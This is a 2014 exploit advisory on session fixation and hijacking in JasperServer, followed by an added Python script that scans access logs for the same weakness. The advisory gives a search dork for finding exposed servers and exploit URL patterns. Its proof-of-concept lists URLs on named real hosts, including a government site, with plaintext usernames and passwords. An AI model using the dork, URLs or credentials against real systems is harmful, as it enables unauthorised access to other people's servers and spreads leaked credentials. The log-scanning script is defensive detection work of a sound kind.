[+] Session Fixation / Hijacking on JasperServer
[+] Date: 09/05/2014
[+] Risk: High
[+] CWE number: CWE-384
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.jaspersoft.com/
[+] Software Download: http://sourceforge.net/projects/jasperserver/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;)
[+] Exploit:
http://host/patch//flow.html?_flowId=searchFlow&j_username=&j_password=
or
http://host/patch/j_acegi_security_check?j_username=&j_password=

As part of the login process, the assigned session ID is revealed in a URL parameter, which allows hijacking the session of another user.

Example:

Vul example: coopnet.leosoft.com.br

GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste
Host: coopnet.leosoft.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

With a request like that, the session ID of the user is revealed in a URL parameter:

"JSESSIONID=4635974EAA38774EF00FB270933D3C7D"

The application authenticates users with a direct post to j_acegi_security_check, which does not invalidate the existing session before processing the login request. Because of that it is possible to authenticate a user, or otherwise establish a new user session, without invalidating any existing session.

[+] PoC:
http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc
j_username=esloc & j_password=esloc

http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer
j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer

http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9
j_username=ratequote & j_password=rateme9

More about the session fixation technique at: http://cwe.mitre.org/data/definitions/384.html
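As an added example (not part of the advisory, and not JasperServer or Acegi code), the following Python scans constructed Apache/Tomcat-style access log lines for the three conditions the advisory describes: login credentials passed in the query string, a session ID carried in the URL, and a session ID that is the same before and after the login request, meaning the session was not invalidated on login. The log format, the client addresses, users and session IDs, and the rule that a 3xx response to the login URL means a successful login are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache/Tomcat-style access log lines (hypothetical). 10.0.0.5 logs in over GET and keeps its pre-login session ID; 10.0.0.9 logs in with a POST.
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2014:10:00:01 +0000] "GET /jasperserver/flow.html;jsessionid=AAA111?_flowId=homeFlow HTTP/1.1" 200 512
10.0.0.5 - - [09/May/2014:10:00:05 +0000] "GET /jasperserver/j_acegi_security_check;jsessionid=AAA111?j_username=alice&j_password=s3cret HTTP/1.1" 302 0
10.0.0.5 - - [09/May/2014:10:00:06 +0000] "GET /jasperserver/flow.html;jsessionid=AAA111?_flowId=searchFlow HTTP/1.1" 200 4096
10.0.0.9 - - [09/May/2014:10:01:00 +0000] "POST /jasperserver/j_acegi_security_check HTTP/1.1" 302 0
10.0.0.9 - - [09/May/2014:10:01:01 +0000] "GET /jasperserver/flow.html;jsessionid=BBB222?_flowId=searchFlow HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SID_RE = re.compile(r';jsessionid=([0-9A-Za-z]+)', re.IGNORECASE)

def session_id_from_url(url):
    """Session ID in the URL: ';jsessionid=' path parameter or JSESSIONID query parameter."""
    m = SID_RE.search(url)
    return m.group(1) if m else parse_qs(urlsplit(url).query).get("JSESSIONID", [None])[0]

def scan(log_text):
    """Return (client_ip, finding, detail) tuples; three finding kinds, see comments."""
    findings = []
    pre_login = {}   # ip -> session IDs the client presented before logging in
    logged_in = {}   # ip -> session ID presented on its (redirected) login request
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, url, status = m.groups()
        parts = urlsplit(url)
        path = parts.path.split(";")[0]      # drop the ;jsessionid= path parameter
        query = parse_qs(parts.query)
        sid = session_id_from_url(url)
        # Both login vectors named in the advisory: the Acegi check URL and flow.html.
        login = path.endswith("/j_acegi_security_check") or (path.endswith("/flow.html") and "j_username" in query)
        if login and "j_password" in query:  # password sent in the query string
            findings.append((ip, "credentials-in-url", f"{method} {path}"))
        if sid:                              # session ID exposed in URL / logs / Referer
            findings.append((ip, "session-id-in-url", sid))
        if login:
            if status.startswith("3"):       # assumption: a redirect means login succeeded
                logged_in[ip] = sid
        elif ip in logged_in:
            # Same ID before and after login: session not invalidated on login (CWE-384).
            if sid and sid == logged_in[ip] and sid in pre_login.get(ip, set()):
                findings.append((ip, "session-not-rotated-on-login", sid))
        elif sid:
            pre_login.setdefault(ip, set()).add(sid)
    return findings
```

The third finding is the one that maps directly to CWE-384; the first two are the exposure conditions that make the fixed ID usable, and the fix on the application side is to invalidate the session and issue a new ID when the login is processed.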